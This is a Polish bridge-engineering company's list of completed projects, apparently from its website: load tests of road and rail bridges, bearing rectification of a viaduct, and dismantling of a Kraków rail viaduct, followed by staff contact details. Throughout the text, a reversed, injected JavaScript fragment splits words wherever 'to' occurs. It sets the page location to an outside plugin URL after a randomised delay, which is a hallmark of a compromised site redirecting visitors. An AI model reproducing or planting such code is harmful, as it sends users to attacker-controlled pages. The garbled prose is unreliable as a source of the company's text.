Zamawiający: INTOP Warszawa sp. z o.o.
Zadanie zamawiającego: „Rozbudowa drogi wojewódzkiej nr 710 na odcinku od ok. km 57+900 do ok. 58+950”
Lokalizacja: Most w ciągu drogi wojewódzkiej nr 710 na odcinku Lutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomiersk – Błaszki w km 58+519,28.
Zadanie: Wykonanie projektu próbnego obciążenia statycznego oraz dynamicznego wraz z przeprowadzeniem badań.
Środki obciążające: Do wykonania obciążeń statycznych użytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to sześciu samochodów czteroosiowych o łącznej wadze 192 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tony.
Zamawiający: BANIMEX sp. z o.o.
Zadanie zamawiającego: „Przebudowa mostu stalowego w km 167,561 linii kolejowej nr 68 Lublin – Przeworsk”
Lokalizacja: Mostu kolejowy w km 167,561 linii kolejowej nr 68 Lublin – Przeworsk w miejscowości Chodaczów k/ Przeworska. Obiekt zlokalizowany jest nad rzeką Wisłok.
Zadanie: Wykonanie projektu próbnego obciążenia statycznego oraz dynamicznego wraz z przeprowadzeniem badań.
Środki obciążające: Do wykonania obciążeń statycznych użytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to 2 lokomotyw ET 22 o łącznej masie całkowitej 233,2 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tony.
Zamawiający: Zakład Budowy i Remontu Mostów z Zamościu Eugeniusz Czyż
Zadanie zamawiającego: „Rozbudowa ul. Zamojskiej (DK 74) w m. Szczebrzeszyn polegająca na budowie kładki pieszo- rowerowej nad rzeką Wieprz w ramach realizacji projektu: ” Budowa Trasy Rowerowej w Polsce Wschodniej – województwo lubelskie-powiat zamojski”.
Lokalizacja: kładka pieszo-rowerowa nad rzeką Wieprz w miejscowości Szczebrzeszyn w ramach rozbudowy
ul. Zamojskiej (DK 74).
Zadanie: Wykonanie projektu próbnego obciążenia statycznego wraz z przeprowadzeniem badań.
Środki obciążające: Do wykonania obciążeń statycznych użytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to 29 systemowych zbiorników wypełnionych wodą o masie jednostkowej 1065 kg każdy.
Zamawiający: Totoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to S.p.A. Costruzioni Generali
Zadanie zamawiającego: „Budowa drogi ekspresowej S5 Poznań(A2 węzeł „Poznań Zachód”-d. „Głuchowo”)-Wrocław(A8 węzeł „Widawa”), odcinek Poznań (węzeł „Poznań Zachód”-d. „Głuchowo”)-Wronczyn(węzeł ”Mosina”-d. „Wronczyn”)”.
Lokalizacja: Obiekt WD-16 w km 16+685,66 budowanej drogi ekspresowej S5.
Zadanie: Wykonanie projektu próbnego obciążenia statycznego oraz dynamicznego wraz z przeprowadzeniem badań.
Środki obciążające: Do wykonania obciążeń statycznych użytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to sześciu samochodów czteroosiowych o łącznej wadze 192 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tony.
Zamawiający: MP-LIFT sp. z o.o.
Zadanie zamawiającego: „Rektyfikacja łożysk w celu wyeliminowania nierówności niwelety wiaduktu nad drogą ekspresową S7 w ciągu ul. Żeromskiego w miejscowości Suchedniów.
Lokalizacja: Obiekt WD-5 zlokalizowany nad wybudowaną drogą ekspresową S7 w miejscowości Suchedniów.
Zadanie: Wykonanie projektu technologicznego prac uwzględniającego obliczenia nośności wież wsporczych niezbędnych do przeniesienia obciążeń na podłoże gruntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towe, dobór odpowiedniego zestawu hydraulicznego do zrealizowania podnoszenia, podniesienie obiektu zgodnie z dokumentacją techniczną, wykonanie nadlewek metoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todą ciśnieniową nad łożyskami,wymiana wkładek teflonowych w łożyskach mostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towych, wykonanie wymiany wkładki gumowej w dylatacjach obiektu wraz z odnowieniem zabezpieczenia antykorozyjnego elementów stalowych dylatacji.
Realizacja podnoszenia: Do przeprowadzenia operacji podnoszenia użytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zestawu siłowników o łącznej nośności 1600 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton, podczas podnoszenia uzyskano wartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tości sił sięgające 1120 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton. Siły zostały przeniesione na zaprojektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towane przez naszą Firmę dwie wierze wsporcze o nośności 600 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton każda.
Zamawiający: REMBUD REIL sp. z o.o.
Zadanie zamawiającego: „Demontaż wiaduktu stalowego na linii 94 POllŚ 5.2-2 nad ulicą Wielicką w Krakowie”
Lokalizacja: Kratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}townica stalowa zlokalizowana nad ul. Wielicką w Krakowie.
Zadanie: Wykonanie projektu technologicznego podparcia oraz etapowania prac rozbiórkowych wraz z realizacją zadania.
Realizacja prac: Podczas realizacji zadania wykonano montaż czterech wierz wsporczych zlokalizowanych zgodnie z projektem technologicznym każda z wierz zapewniała nośność na poziomie 90 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton. Po podparciu obiektu rozpoczętoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to rozpalanie elementów stalowych za pomocą gazów technicznych. Demontaż w miejsce składowania odbywał się za pomocą dźwigu o nośności 250 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton. najcięższy podnoszony element miał wagę 44 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton.
ATEST SP. J.
ul. Jana Matejki 31A
43-600 Jaworzno
biuro@atest-lab.pl
KRS: 0000475751
REGON: 243366299
NIP: 646-29-31-635
mgr inż.
Bartosz Skulski
(+48) 536 401 301
bskulski@atest-lab.pl
mgr inż.
Bartłomiej Oskędra
(+48) 697 277 033
boskedra@atest-lab.pl
mgr inż.
Marek Błasiak
(+48) 793 160 828
mblasiak@atest-lab.pl
tech. bud.
Piotr Skałka
(+48) 720 803 324
pskalka@atest-lab.pl